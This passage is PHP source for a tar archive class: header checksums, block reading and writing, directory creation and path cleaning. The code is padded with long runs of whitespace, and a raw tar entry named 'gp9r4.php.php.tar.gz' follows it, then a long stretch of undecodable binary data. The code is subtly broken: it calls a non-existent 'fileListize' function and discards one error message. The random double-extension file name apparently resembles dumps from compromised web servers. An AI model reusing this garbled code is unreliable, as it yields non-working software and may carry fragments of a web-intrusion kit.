             
	                    	                    	                    	                    	                    fclose($destination);
               
	                    	                    	                    	                    	                    touch($header['filename'], $header['time']);
	                    	                    	                    	                    }
	                    	                    	                    	                    clearstatcache();
                
	                    	                    	                    	                    if (fileListize($header['filename']) != $header['size']) {

	                    	                    	                    	                    	                    $this->eventErrors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect');

	                    	                    	                    	                    	                    return false;

	                    	                    	                    	                    }
	                    	                    	                    }
	                    	                    	                    if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = '';
               
	                    	                    	                    if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/';

	                    	                    	                    $this->dirs[] = $file_dir;

	                    	                    	                    $this->fileList[] = $header['filename'];

	                    

	                    	                    }

	                    	                    return true;

	                    }


                    
	                    function dirCheck($dir){
               
	                    	                    $parent_dir = dirname($dir);
                


	                    	                    if ((@is_dir($dir)) or ($dir == ''))

	                    	                    	                    return true;

	                    	                    if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir)))
               
	                    	                    	                    return false;


	                    	                    if (!mkdir($dir, 0777)){

	                    	                    	                    $this->eventErrors[] = __('Cannot create directory').' '.$dir;

	                    	                    	                    return false;
            
	                    	                    }
	                    	                    return true;

	                    }


	                    function readFileHeader($binaryData, &$header){
                   
	                    	                    if (strlen($binaryData)==0){
          
	                    	                    	                    $header['filename'] = '';

	                    	                    	                    return true;
                
	                    	                    }
                  

            
	                    	                    if (strlen($binaryData) != 512){
	                    	                    	                    $header['filename'] = '';

	                    	                    	                    $this->__('Invalid block size').': '.strlen($binaryData);

	                    	                    	                    return false;

	                    	                    }

        
	                    	                    $fileIntegrityCheck = 0;
                
	                    	                    for ($i = 0; $i < 148; $i++) $fileIntegrityCheck+=ord(substr($binaryData, $i, 1));

	                    	                    for ($i = 148; $i < 156; $i++) $fileIntegrityCheck += ord(' ');
	                    	                    for ($i = 156; $i < 512; $i++) $fileIntegrityCheck+=ord(substr($binaryData, $i, 1));
                


	                    	                    $unpack_data = unpack('a100filename/a8mode/a8userIdentifier/a8group_id/a12size/a12time/a8fileIntegrityCheck/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData);


          
	                    	                    $header['fileIntegrityCheck'] = OctDec(trim($unpack_data['fileIntegrityCheck']));
          
	                    	                    if ($header['fileIntegrityCheck'] != $fileIntegrityCheck){
	                    	                    	                    $header['filename'] = '';

	                    	                    	                    if (($fileIntegrityCheck == 256) && ($header['fileIntegrityCheck'] == 0)) 	                    return true;
	                    	                    	                    $this->eventErrors[] = __('Error fileIntegrityCheck for file ').$unpack_data['filename'];
              
	                    	                    	                    return false;

	                    	                    }


                
	                    	                    if (($header['typeflag'] = $unpack_data['typeflag']) == '5')	                    $header['size'] = 0;

	                    	                    $header['filename'] = trim($unpack_data['filename']);
           
	                    	                    $header['mode'] = OctDec(trim($unpack_data['mode']));
             
	                    	                    $header['userIdentifier'] = OctDec(trim($unpack_data['userIdentifier']));
	                    	                    $header['group_id'] = OctDec(trim($unpack_data['group_id']));
	                    	                    $header['size'] = OctDec(trim($unpack_data['size']));
	                    	                    $header['time'] = OctDec(trim($unpack_data['time']));
	                    	                    return true;
                   
	                    }
                 




                        

        
	                    function writeFileHeader($filename, $keep_filename){

	                    	                    $packF = 'a100a8a8a8a12A12';
	                    	                    $packL = 'a1a100a6a2a32a32a8a8a155a12';
	                    	                    if (strlen($keep_filename)<=0) $keep_filename = $filename;
         
	                    	                    $filename_ready = $this->createValidPath($keep_filename);


             
	                    	                    if (strlen($filename_ready) > 99){	                    	                    	                    	                    	                    	                    	                    //write long header
                   
	                    	                    $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0);

	                    	                    $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', '');
               


        //  Calculate the fileIntegrityCheck

	                    	                    $fileIntegrityCheck = 0;

        //  First part of the header

	                    	                    for ($i = 0; $i < 148; $i++)
         
	                    	                    	                    $fileIntegrityCheck += ord(substr($dataFirst, $i, 1));

        //  Ignore the fileIntegrityCheck value and replace it by ' ' (space)

	                    	                    for ($i = 148; $i < 156; $i++)
        
	                    	                    	                    $fileIntegrityCheck += ord(' ');
        //  Last part of the header
                
	                    	                    for ($i = 156, $j=0; $i < 512; $i++, $j++)
                 
	                    	                    	                    $fileIntegrityCheck += ord(substr($dataLast, $j, 1));

        //  Write the first 148 bytes of the header in the archive
               
	                    	                    $this->writeFileBlock($dataFirst, 148);
        //  Write the calculated fileIntegrityCheck
                 
	                    	                    $fileIntegrityCheck = sprintf('%6s ', DecOct($fileIntegrityCheck));
	                    	                    $binaryData = pack('a8', $fileIntegrityCheck);
	                    	                    $this->writeFileBlock($binaryData, 8);

        //  Write the last 356 bytes of the header in the archive

	                    	                    $this->writeFileBlock($dataLast, 356);
             

	                    	                    $temporaryFilename = $this->createValidPath($filename_ready);

	                    	                    $i = 0;
                
	                    	                    	                    while (($buffer = substr($temporaryFilename, (($i++)*512), 512)) != ''){
                  
	                    	                    	                    	                    $binaryData = pack('a512', $buffer);
	                    	                    	                    	                    $this->writeFileBlock($binaryData);
	                    	                    	                    }

	                    	                    return true;
               
	                    	                    }

	                    	                    $file_info = stat($filename);
	                    	                    if (@is_dir($filename)){

	                    	                    	                    $typeflag = '5';

	                    	                    	                    $size = sprintf('%11s ', DecOct(0));
                    
	                    	                    } else {
	                    	                    	                    $typeflag = '';

	                    	                    	                    clearstatcache();
	                    	                    	                    $size = sprintf('%11s ', DecOct(fileListize($filename)));
	                    	                    }

	                    	                    $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename))));

	                    	                    $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', '');
           
	                    	                    $fileIntegrityCheck = 0;

	                    	                    for ($i = 0; $i < 148; $i++) $fileIntegrityCheck += ord(substr($dataFirst, $i, 1));
	                    	                    for ($i = 148; $i < 156; $i++) $fileIntegrityCheck += ord(' ');

	                    	                    for ($i = 156, $j = 0; $i < 512; $i++, $j++) $fileIntegrityCheck += ord(substr($dataLast, $j, 1));

	                    	                    $this->writeFileBlock($dataFirst, 148);
	                    	                    $fileIntegrityCheck = sprintf('%6s ', DecOct($fileIntegrityCheck));

	                    	                    $binaryData = pack('a8', $fileIntegrityCheck);
	                    	                    $this->writeFileBlock($binaryData, 8);

	                    	                    $this->writeFileBlock($dataLast, 356);
	                    	                    return true;
	                    }
              

	                    function startWriteProcess(){

	                    	                    if ($this->isCompressed)

	                    	                    	                    $this->temporaryFile = gzopen($this->archiveIdentifier, 'wb9f');

	                    	                    else

	                    	                    	                    $this->temporaryFile = fopen($this->archiveIdentifier, 'wb');
           

	                    	                    if (!($this->temporaryFile)){

	                    	                    	                    $this->eventErrors[] = __('Cannot write to file').' '.$this->archiveIdentifier;
	                    	                    	                    return false;

	                    	                    }
               
	                    	                    return true;
	                    }
          


	                    function readFileBlock(){
                  
	                    	                    if (is_resource($this->temporaryFile)){

	                    	                    	                    if ($this->isCompressed)

	                    	                    	                    	                    $block = gzread($this->temporaryFile, 512);
	                    	                    	                    else

	                    	                    	                    	                    $block = fread($this->temporaryFile, 512);

	                    	                    } else	                    $block = '';



	                    	                    return $block;

	                    }


          
	                    function writeFileBlock($data, $length = 0){
            
	                    	                    if (is_resource($this->temporaryFile)){
        
	                    	                    

	                    	                    	                    if ($length === 0){

	                    	                    	                    	                    if ($this->isCompressed)
                
	                    	                    	                    	                    	                    gzputs($this->temporaryFile, $data);
	                    	                    	                    	                    else
             
	                    	                    	                    	                    	                    fputs($this->temporaryFile, $data);

	                    	                    	                    } else {

	                    	                    	                    	                    if ($this->isCompressed)
        
	                    	                    	                    	                    	                    gzputs($this->temporaryFile, $data, $length);

	                    	                    	                    	                    else

	                    	                    	                    	                    	                    fputs($this->temporaryFile, $data, $length);
               
	                    	                    	                    }

	                    	                    }
	                    }
          


	                    function closeTemporaryFile(){

	                    	                    if (is_resource($this->temporaryFile)){

	                    	                    	                    if ($this->isCompressed)
	                    	                    	                    	                    gzclose($this->temporaryFile);

	                    	                    	                    else

	                    	                    	                    	                    fclose($this->temporaryFile);


	                    	                    	                    $this->temporaryFile = 0;
	                    	                    }

	                    }


	                    function createValidPath($path){
	                    	                    if (strlen($path)>0){

	                    	                    	                    $path = str_replace('\\', '/', $path);
	                    	                    	                    $partPath = explode('/', $path);

	                    	                    	                    $els = count($partPath)-1;
         
	                    	                    	                    for ($i = $els; $i>=0; $i--){
	                    	                    	                    	                    if ($partPath[$i] == '.'){
                 
                    //  Ignore this directory

                } elseif ($partPath[$i] == '..'){
        
                    $i--;
                }

	                    	                    	                    	                    elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){

                }	                    else
	                    	                    	                    	                    	                    $result = $partPath[$i].($i!=$els ? '/'.$result : '');
	                    	                    	                    }

	                    	                    } else $result = '';
	                    	                    
	                    	                    return $result;

	                    }

}

?>
gp9r4.php.php.tar.gz000064400000072644000000000000010172 0ustar00��ks�X����pU�"U�%�&%]�6�%��H�yu��	|��"f�;�F�7��:Ž���{�g�=�=���K�<�$��HUu�Tu%8�<y���̓'sJI�l6#ʘ'�="eE��>KR�	9Q�<G���K�b,J�'�R<4L����0�I�����x"M��|�$�8���KTY�$��[�#���L��F?���D8�����dzD^I䉫�+��Ҫ�-V�9Q ¡8�
ik�n�ntH�D�'(f�	��H#J��D��(=��xN��"D�O	�x�%�R<(���:fE�Q���D	�R,-j�d߷{�sv�h/����>'�Ϩk�}B��L��`�7�hQq�@�a��A�Y	<g���`����FeZ�&
��"�ń���)�\�'�Ԕ���Y�����L�{�.�͈<7e�-��I��Xj����LJ���|�w�����K��O	},m�߹W�Pm�~4_)��B`~�����{;�
���A��'<���xJa%�1\f�À�x�O9"Ie����ك��`R`����J��"��<k���a&Q�3}p�I�;]
5���\�g
z��"ߥ$�Xf!���zy�9�
�
���ABb�o�Ufy�Vz`��;j�?ӎ�� �E���1fآ�Z���
X~b׬����e9Ytp(�P���:!8O� =��G>إd���}wp�fߠ���|�`i���x���A�
;��yӖK�UN�ˀ���إxb,0�=����R�;����7��E���:!�B��<�`�H�b]��?���4S�#Z&��$j�qV�%
�f6�m�?����/+�j4	�� �h��9��%Vf��/�����/��}������/G[�*!�ڇ%��,�ó
K(0N3&J�/A&(���/>�&��A|��@����O������ ��Ͼ����Ͽ�|]}�5,�נ��=�o��?#��x�_~>�Q}��?��O�����/�}lc�����/����w�gȟ����5��`�-���K�KL�˿���Pk��-(��A���|�@����@�<|��:A���,W��/�@�[�������7H_��1`;�,�Z�߃�)��w�+���0x�|X��2���� N~^�cL2	�FO2~�;$����(�(��hBk�N�,�_�7�0�Wp�ę����-h�_
2����[��߁w:֊��c`~�Z�-�o�t?�0��@�P�<'����_A m�.JزEP��!���U8�����@~�o(H�S�ڨ�������	m�!��U���#��
:sb�^N�0��iMp���s\6�ն�/�������v e�ĵ�-�޿4�� x�-�h�����?o�ւ�SV`%́w���Q�
x(�D`Z�TO��K��1����8fu��|v��i�1氢m�����/��O5��	��h��
��@��7��~����5��mq fa�-P��a.��h����h���p����#IJ��$,S,��=ZY}&c��A�+S���\b��	G+�U���>5�<Bĉ�&ח��E�t��7��O[Nu��c�~~���ml��e�l5z3�1%P
�E@tDP=�d	(�i��6`E�f<�с":!�vj��;�;��ĉ?X�#���G�9�,��?�o�p#�<�
WR]�e����S˪hPSV#"cu�(j��n�u�g�A����T�J1YҢ
���@��=|�6&
��)!�po"�`�e���E#�[�J��X
h�X�[�^>�}3�����bG��j���u�4)m��n�xO
�	�L�/N����܌$
��x.���?A+����D�\������E�*�_�uir�3Ȭ��I�$J"��	N0��@���x�����f��:�a�.KB6ޯ�M�{���ڥ���m�p�5��7�UY��Ee�:�y@�Ą�(�U)�},tPT�+*5Q+o*b�U����İ�$�%jL�3���;���q�Q�Ms@
������n�B��Qh�g w�"�}�/H�9Z���w�E�/�"����{�3(��'(fS�D-�>V�}�
~1,�Փ�/u��Z�P��?�(��C�x}Sl4?��s���#��?�}!�qd~_�eQ�.dE�! e���G�_���0Hc@��iƹ�҇0�����E"�?�f�(�u��!� ���BP���wp�*�G=��Y��X�?��P��kv41�F���B�P/)bʁ����2�
H��&�B�&�}��Q��>�j.�Lϲ��q�ƥ@	'�P����ǑP�X��W*�B�2m�;�f@X!�Gs���
��]�4�'hyG�����	P�����)�J�f�gP�����w|��˱�>&�m��gP��֝�|�5'?ꘕ8���&?'(��}D��x>�r��8f�}�z�#‡&PaoP�_9�i��7k�ZFv/���ڗ�0�؝�G{UЩfV�S��7l�p�He�èp����+؉��ԣ� ���9;s��?�g���SU�$})�;t�I��{G��o��C^���8��{��=��r��X?ټ��jP
�΂���"�(�-� 1�|��i�0
ijLd	�D�E�ar��L�ܸosMQh��k�Q�
�AA�2x(����d;�X���N� "�J��M��b6z���V��Z���e�q�
���(��
rt��sͫ�n„����@�!�J�g�hl1�z���m\kY�6��h������<P	r�P5IQ�����0xj��..$e���U��'����#'�č��yy���
�j��"a}��{6�R�%��@c�\���a�V�(?��0�%M1�HW)j�����
.T֥e랡����I��r�4d��-=�M9�+�1j���U
�(m��}K,�v9�T�۟ߨ
$��恰�O'��0�
�r�:�6���,w���sIsE�<vZ�N�{��)d�@[	>Ȳ�;:�B����	���q�M���k�Ne�b�U��5�W�|�x�|�d��7��"@Y�ԧ�[7T�`�s��ªf�<=ӫ�@��a���`q��V&E��v�?�$^�t�R$C=o�}�롯n�P��
b�VC1��]�S��^@�����.��ђ��&��҂[a�5�[����.f#�[��T��?��W�	4��?XՊ/7ogTN����?Z��ȉ!��
W4������ZN
e���'t�w�C�7���>kh�P��ߵ3u��î$)Q�P�SjJI�{�!@X!2��IxT���c
`["��e�G�,����u
[������f��l�H�*���K
�s�sxXo�)x�<��g����������&����&�Z�Q�>�T��|��X��Z��nOu��ק���q6J�J����ǶN�"���cJ�~�W|��?���?��o��o>���w�;�
rm.�5��^�f%	��O���h�� �j�J�
a��C#�e��{��eD!��w���
$n�OD"ՁD��[°3J4�e(C<<�}�sS��wǧX޷Ca?K�m
�:��çM��"�`}�`R�W@�G쑟<���i�Bkvg��}C�T���?�z�&პV��>����`��}� ��vM�B{&��_bU��M(Q�^���̱>B��f��%0�[&,.;��#��+�!�e��Ae�V�-B��,�_r2��ᶼ/�}0H�+P�iJ0[
BK��<�N������9p�,O��y��o|����8��i��a��X�D��%g���ʳu�
�T�9���fk�^Vˋ���RxN�=>ۚγl�ⵌ&�qd�z�����8��R���X��ׄ�yt�������;��E��_�k"<χ��"�1>~��	ʋ���8r��7o�J^��5�����������c`1�<G@�ېC�A��t�tZ��]g�*�O��5��p�pr����	y���os���;n;�؉����~L�M0�@��@t���m��ok��v1��K�R��p�����!`�r���!�a$�3���CV=�f��w���É(I�f+m la�n#�p��G�'���%��K[
�q�3K�[��\k���AȨ���8 �<Vm�bPݕx�<�Du�q4�U,{�Yŧ���4¦��F艿�q'�:U[��[Q��������k�7ٜ~���X֫6ݱ��LL���1�G�v���)+)�������X@��N(W�N�N�ީ�}�_z��q�a?D��9�Y;#&��u�;p�_`gZ-�횦E�m�����>�����Ad�A��;��!?Yj3��D|�Abm�3�j��L.7�Z~�^ۦ�#@�B:�!�G7�jt��R�_o)H��8���7�):�B��8P
��/q�32R�qSK�$��`�i@�U�w��y3M��~���C���nQ�����wm<n��:� ZYIB�H�ڻb�ծ���2O>�E%C��,��\㨇�`d����,��퇷���~GA�JQ�@��c� �r��	����	�'��\LX�d�s4:| 1��{}~��r��|�"���`K`��$�P�F�m
`�?4�t�ׄ{^������n�V�+�#R���3�*�m����ǫ��.m�k�"+>]R���V
m�pn�=q�
+�{�v�|6����c��Г]��Qp/��d"Kne�M���R8����SR�%������z
�yQf�\l Ul���X�GM��ʶ=�$#�0lj����v0�O��Z�
�RT�h��5"�w���;��mf�
�K�`ݼ���R�l���t��
�P�U��5�V���|�;�,�kO��V�����q�\>���Ba=��`ۨ��ol�Kp��kҏ��!��BW�_t}��f�?�7�p\z>X��&���p�@�"C�J���Mx�h��V���}���|k���2r<k�te�I==�.�h=���b(p`����E��ky�ɣF�����L�T������@��_��0�����%��+���ɜ�P[C���n c�"K�m�ܴ�l|���䰶���#�D�WO�a��e�&6�ܿ3�ÕWh��)��.��=���H��g��q>�xf�3��WF|Dν�ls&�>'��?�[7�]����@v��=��P��G�Shp�y�~=���o�_ۋ|q�` ��f�te�n�cD-6v!$n�����'�,JdA��mH��yF��{���A�k���m{窄�Bf~��#%`6�lvU���ծ�Hf�A"$"�{俶ŲC�@���/\���v�Ăo���Q�߲�`=��<|��ߝۡ+����� �޴�z��ւ��ǽ�e�Oo�=O���.��lǠ��vl�o��b�U���cp-�}�S����y�±ܐE���Am�%��&X���C�]h��1��^f�#*�!_����_p�!��{�W�'��|ƀ| �߱B�6�e�Ȗ�Y�Ip_fy���S��b�y��f�����7��@(�A&�0|y"��C�Ѷ���~��A�|G`L!�	.���M�XIw�sx��)�j%�C0t
�`A7%%�`���?@���_S
+�cV�Lfo"��A��3{{'.@~�H�Z�@������!�_fO�G��ȟ�}@�}�C2
r�?�#N���Ҥ��P#%�tf��聄9���	�p���
8v���o[`H�2��Z��%8^IOZ��'m	��=@��2 �h#@��iK��{s[;$n���r��G��:�Z^�0$��,���6e�
u��]��!7��e�{(;X���P�t�~�^��N��/9�	/H�}/�p�z�[=���u�(���	ݥ]���H׸��s*]��OW,��	��g)��r\8�y��r�J7[�#./��8<�ܿfS_
!�
���h��]ڳė�$��Adޙ��V�1ݥP"�	r�~A����-�ۀ݈�����ݐ���&}[�$���[-��?�>?���<+�Kt����\a��Z�!��u��T����'Ah�8�Ra:}@3gEWМL��q�5�y��ug�ƈpj�����u�6���؎�/�3s�z�BiKo;�a���2Vy����F���ޯzҘ��:�d,�����wd��o}�]Cv�������{5��*Շ���J���+�1��\�޺7�۾-�n+����/��~��8�<���{��\}��>��a��`�Λ��4�B7a���1q/���)�g������"g��1-�^��h�qN��̿}��^�<x�D�_�'��@¨–HХ�hK���/�:N֣5�G(P����{K/�f7���h���t����^�0di`B[����[G��J1�$�!J��%-w�WO�ɾ��z�3�I��3���%��Xۅz�
��\"�w�F�A��:�!�h�o�ʍ:. ����͢�������ؠ7��n�Y��~l�}0|L�������ܼC�Ɩv(�dS�6��&Q�6k6j!Z��M���3�	�a"}����!@�Θ�7��?�ܛbC�О����9`l��a��{��
�So�%ʌ�i�;x��
�/ı���J��p��
p@�~=��,��@��D�`�,��[�VIz��N7��l��Z�7cy}��i��U��]��̧{�s�����p���n߼h7���F�׌f��HR�y5�fIA�_�1=��k��g��s�贤!�r=��+�J`x��GNU�Y��Zao&B�k5��#P���֩G�JP��B���Qf(@�(���>_��f�4�%ʧ�7���+,�y�7r�Va����P���aս�#��1�)`��Q����
�)G7�!����~>��=�j>mt=S��`�+:��Nv�qv��y�H`4�4hx`��������O�j,�eێS��o��
�NIS,�YZU���^�?{֞�� `�M�LӀP�!иmɘľypO
�Y��{XA���y\ߺ�,Jo`�6��]�j�JaP�@���`�C2��_̫�Pے���I�zy�_q�G؀�Ob�	�쪎�nv�΃����`��(��<�V_A�hZv�SC?�M|�f�T�����5��oL�[������n��,��L�b����JN�O<d�
��,m�ߟ�[�,3�c-%��tl���CW"�k��OG&ύ�f�9����iq�2�І|Ak�>UF����@��������_�&�$��âk4NxV���C���dnu��ڂE`�h=����i��#��Б�$%®x�'�&g(t������OY��!� ��)z��S�W��/u�V��+ z��Jy�H`�w�Tyi�#8�o�b8x�lͽ�	����/�/m26��9�u�q�.U�!&"�qd]!H��vZ�1ʤ�J���z@N��1�� ������i_̂�j�fP��O9�5{��^¿b�	?�N�\��^����"y
����R�D�b���P$���G��@o�L֕a<m'�˻b���b�$�����,J�r��_�5��4����$+��\����>x�-M%**�-��)m���<|kތ}.Ξ
�MYb�3Q~
G������$o��B�.��\6q��z��ءnS�B������a\m���8�mސdjث(��R��
�1����a[�ܴ	�'e6Ǒ�h|.�����<�n�A�
Gr|�*��3�K&�*gI���D���mR��³�a���ϙ;�%�i�g{U2����
�=�S�8-�)����Y%@��d�n�?V�邊��s���
�ߜ%n����kq~y��D�N��?r#���a�"
ʌ�����$�.j�v0V���4'Tmػ=�Ig�>���dJ�%S-6�ID���e%'�+�j�2y�����_V+d`IFÕ���n�&S|�vr~ͧG��(�_\f#��P��ꑧ�$Q�'�,.��Nj�(]�M��� �jOQE�O�t���Q�6�[�K�"hGI�҉��|���Y<�$�c���Ҽ��ܒ��euֿX��ۀ:lƛׂ��Os���!���T���\�$gO��i�~<��A����oF�&�?�O6{�*u�p���j3��#�c�s>[,���s�\�-�ߌ[��?_�ޤa��
_�n]�7�j{x�n�Y���9l?����S�_r�<�\J��T����u�ب_�GK�'�����MEB1ҏP�
�W�TF��sxѪ\���NU��ӻ�Y�T.������<wu�>����y3m�}�\����c��L0*Z�Mn�Mv׹B;rW%]5=/UNcl���7�ܐ�k1�vb���V�6��4/��������D�D��ۛi�NM�쒹Q�ynV�Q�V��*��
O����M����S<��]�Y6/��=?o#��;��$�����g2�X���NX
���G�}nrvHz�,=�sl�Ǿ��Sr���
���SsE:��00�,g�@o���x#��N�A�9t 6\�uO-���=ݡ3��9Wb�ゟ����:w�3�=$p��&��B*��Qb6���O>�T�E�\����fH0Z�m2��sRH-�uضf��ej�ϊ�E�5h�s���$�F#v�QZy��a�c~�<%{��j��J_�w��x<��^�J��m�^(��f�q�N��Q�.c_�`A����%CNa���J�al%���0�j��5��2'�=����s�`�*��ޑ/�ftڄ�х�U���.(��t�]V�l�X����U����n�wf��z�C�N>�J�c��z-�vE��eOt��Ә��#�G/�V+Pګ-1o�,�!w��p>�a�g�DiX]��ʒ�︸�h1fM"��3{�_��ҳ{/x��qx���\�}MG��=�VL(��	+�DvrHpy
���v�~3������S�:U}�f�k�6�CŁAᬛF�5<
�z�3�|M�'Ǿ��k_�H���n��i�N��O>�P�G�#��i�:?�v��~��c#�!�}Ш�X�̎��J��9�s�o0�D��FW��A&��z�o �f��jۋP��=���`� X/\z;`]<�ԙ���F��҆�uУ�=A�b�w�I�⡻ܘ$-3��� oQ�o�k��_%Q�Bз5'�����-����������j�"|4�m{�d(i��������B�V!j��#�(��נ�W�+Өݐ
��,W�]�7M�sF�'E�_~��/����������o�������_��/��������$�����/��PVtw��7:k"9�ŃQ��ct��a˛�2��^$�o�<Z��ՋiLO�[߹nR�x{)��K3������zc��]�����9ٟ�c4���
t}����R�6>���g��AB�:{�~���$j
�	�N@�Db���=�1�>ّ�`�j�^�W'�
j����(��R,�'�����h���@G��XA��ɴ~��8�ǖ�Z�%@���|�l�ˑ�ĉu������ًȵ��
�֤3�lE�ъ�>�7��ݯ��d��0�U�6�L�!U���,�j;�F��׀݉�l��̢:���R
i�1�ei/�D�+�����ђ=1�{�2Q�YP@�	g�V�AM�+�'�qZ�:?7Y���e:u��5���!~`�G �j�b5�C��3�I�:!��_�nQ�^8����@ә�uvV��洸���@
��B�/�����f�6�{''0p�U�$�'�ܷ�(��7�(h7��7��E��OCkD��%$�hO`aJk�'͏p�����.C�p�D�Ahϡ���ep��G���Syl$�Q�`U'h�����0f�>�_��n���.!���Q'P uA�5���j�~�1/3���֘&�"Uo� *8�N1�mՊ�O��PI��WA�ֽ))ӹ�C����3���#�Ү%�
���b'�!�����i�6I�
��Hۮec�O��'���'��h�y�U�����>'h��7f(��	N�eo?�1!�v�Л�����H�Eqı��FH�e@C�_�Bc&�w�+H`�m�J$�����7�&j!?�fe����Z�\��2�ϫ_?O�����;��$��X`D�狽�:f�T���c��FQD��2�4������&��"�x�=U�O�$���a	jʱ3�	�Gh8�7�e�a�)G��������e���L�h	����F=���J����b�U�|���Dc
��.�j�=���0�\ۭ'B�.�����l�J�����y��2�;����gŸ"tÂ�&�k{+A�B�xd8�7v���)&uL�I���;��f\��h�l�Q��=ڠ؜�Ua�E�mm�kQBo�>��}���+�ʨ]반���z��h>���kX���Yy��m;d���=;�zE�)_l��W��x��|��iK+?�����rf�sN��I���f�/U+���y2ա�ڤ���eƠ�2��P��J8/e�Á�4�Z�����l8��3m�(�^�_x�r]�]]�^�j�Ca�i��@��03�%��	L��u���#��ni�ODV��ko]�����Qϵ�y���0i�~#k߾�lT��^���>�����xp�w�ݽ�+�F�,h��xe6֜l�1˖tt�cײ�:�ن�m\&C�r�-�Z����
�	��v��
��Z�t�J-A�ИQ(cލU'�>0�~�w�vb:_x�Y�w�������E��{ۑ�ڝ}p��i|V5�m�f;�-Z��2���p׃@�r}�i�X#D��e<�X��B�S��V37��"��a��dt��ԉ�=Ϸo�晍��{�-��&
�������t0�V�O����iq��������C��y�V}8+�=dA�*cv����9h��ώP��7B@���̉�[w4�0|�ҪCߚ������Aۙ�1Q/��z�*�ܺ��I��5-���	&������].lenA�Y�ɷ��x7�|�f�̏F��`��M���Y\H�8We�@yD��lK*7�`��Q����lmp�]�}N��� ��w(͞��,�8���=��c9��dN˥ ͜_��X�
��3�[�0��j�D2������)7rS�)_���X�i<�7>��}K��h;��=��tRo�;�l'ۣT^9"�9چX���\A��q�88�	�qv�U/�޺HI�H���d:��csi��Vx��˅axg��8��r:j\9��*!�}U�0 V&z��P�������hh�FF�ؗ�1%�>%Q��=Q#<^qS�F����(8/�(;L���
�Vƿ.�I��-�m�f`�����?O�DW����t���zz���O�}���#oѓ�8sUF�`��~-o"�:��X �qS��	Ŷ�E��D8|l��o�Q�>�H���DWTq$�b�D�&¿~����!���{L������a�!@ÿ88^s��� �=Y��/�vr`�����}��:t��%���f�W2{]�F{'7o��!@�Z���խVke���k��0�I�8��z���p~�̽ot��������!�1��9��,j�'q��A"S�Ԯ�7�b={Z�6����
��|N�C�����m+��j�J�R�g��Z&������hTZ�z�Ԇ�΃�'�/m��X�o�ٳb��#�[�X*�a��\���j�^mֳ�h޸����E1D}�s��=�@-*�1m4I�@�"����}���w�I���?=���z��
��GL�E��G�p���w恦x�0*�i�!h�[����y����xr���~��}@{扱E�A���ʲ��һ�,�jm���KA.��!�}<q�$\�%� p�`\}
�
���
�C��.��1��|���t>�&V�s���J,<�R����!�����1�/�k;>|e�?�)�@<t�0=Q�{Q�^ۅ��0
h��B�k�� �,�4�{C|�GW�*N&�q,G(eK���w�r���SV�4Q($�|���h
Ee-X<R(K�R)����j�!x��:�
+�|���(�8�D��i:u�P��|.�O:�8B����0(0����4�P��П����8<`����W>�&\�G��^�Zq˚��|�S�&����W�vE�Y˙��$#{����Q8ҵ�D_�v^]�|uÅb1VL�
��p����"�T!�6�rKX��Z,B	!V�a��B)��$
�Ytk��K�R�:���6뚶��s��)���wHڄ�D�9�q�����|��A�|���8���nf8���U_^T%`^�
�����
�y��!�&~�!	��n���|���v�bM3���QO�U�y��ȉ�˱�?!k6�|ބl�E$vc�+1�ͱ���D���E������ڌ��H�:=wcU��7�B�,��F;���M6{6��VUh��&�a,���8����fpS.���\<{3j��ף���̨uC���i��s�Zm(�/K��\(��loT�.j�d���R*~��C*}�VI���Je�t"��4�e���m�P�W���Ǜ2[d�y�yg���r��,�-f��N��D6.s٫A�0��r�l�����e%�-d��i�2�8#g�����|1K�£栒/go��\r8�����3�w����i�ҎV��RVɞf�^��̖�L�Oe�s]>_le�|���|?��x�j��R�ԟes�q#}��V�J��;oE;�l%�^jŬ��f���y�+�L��z
�W./��l��uO�<�N7T�X��D���rZm\'��R7���s�2��O����:ھ>�GYu&�;�͋\5K�����|�T?�ɫC�2^��T�*&�>�$��)�8���U A$�����=�,P��N�l*'��̧�u��[�H���MV�	T���g��U�v0��({7JT��y�MO�z��0��l��ȁ�x���E�w^..�ڥ��հ?���͋�)Q>�V�xxFV�
IΘ�Rl�^$n��M<Rl��Dq,>=�ป��}Ç��������@��&+����Z�P�=��6��Y3�����E��>����S��cd M�7l����hܠ��ٻ���7/�'�,�R���.�\�l�N�O���)�c�ryrޯ����e3=����F���A-��w���2����b��^��T�j�ٸ:�o�adV '��y*wQY����"�o�g�-q����q�.^�K�(u�/�s�z�<R�՛��F�ܔK��Y�|H�ˉAd~�N�)@`��tq:-�s�|��i�n
�VA���S�~*��ם��XLߊ��kZ���ڳ��������\��٬�o瞮��BV��ռ���Nu�H9)����Y�qVP�B��̙�u�s��7�E&\��\�4��-�ڍ�~�,.2�yu6*Jg���E󱨆�%�����ay>�ʕ��mQL7+�\�+^���ws�8O�����|Rj6��ix�h�#��#�9q8JT�T]��7�H���H`��D�jt��y�B�=��T3~(�7��1�b�&������y�Eը%*��k�)����_LoڬX|�G�C�ڟw��[E��5O�;ꊙH�AX�1|=Q�sway:���d�*��f��0���ܸ{��۝9;����N8.w��Y��L��N!�O[����Mҥ��E~Һ�T�t!N[��ɣ�>��V:rWi��;�z(�:������Z�����$r��\vo�줖��Ǭ؍\���D�l�No���,|X��N�r�N/�|�#�r�V�>�;�~�x.�U�w�腤��z4�=E�b�zqa�n����0}O��y�����.K^���[��&��fe4���ㄺ�yNj\(��pO�6)5E����R��Dn��<s։��\'&���E_L��US�H\�J�tŮRdR��$�lR,��e7�c�nL�2rC�ƒ�uV(�O��l�S�˧A?=o��ݧSI���V�pGW���ր�=���u�)������}5<N�j��x4vڥ��y�=���d'��d�hv����j��y:v�DU���(2~
�#Oa`��Ĵ�Ds[e呋���sY�S^Pi�Zb�j�[�	#�)E��|DR5I�')�6
'%A��Ta����c��ȵ�vNQUe��nKB{�J�V���i�z�
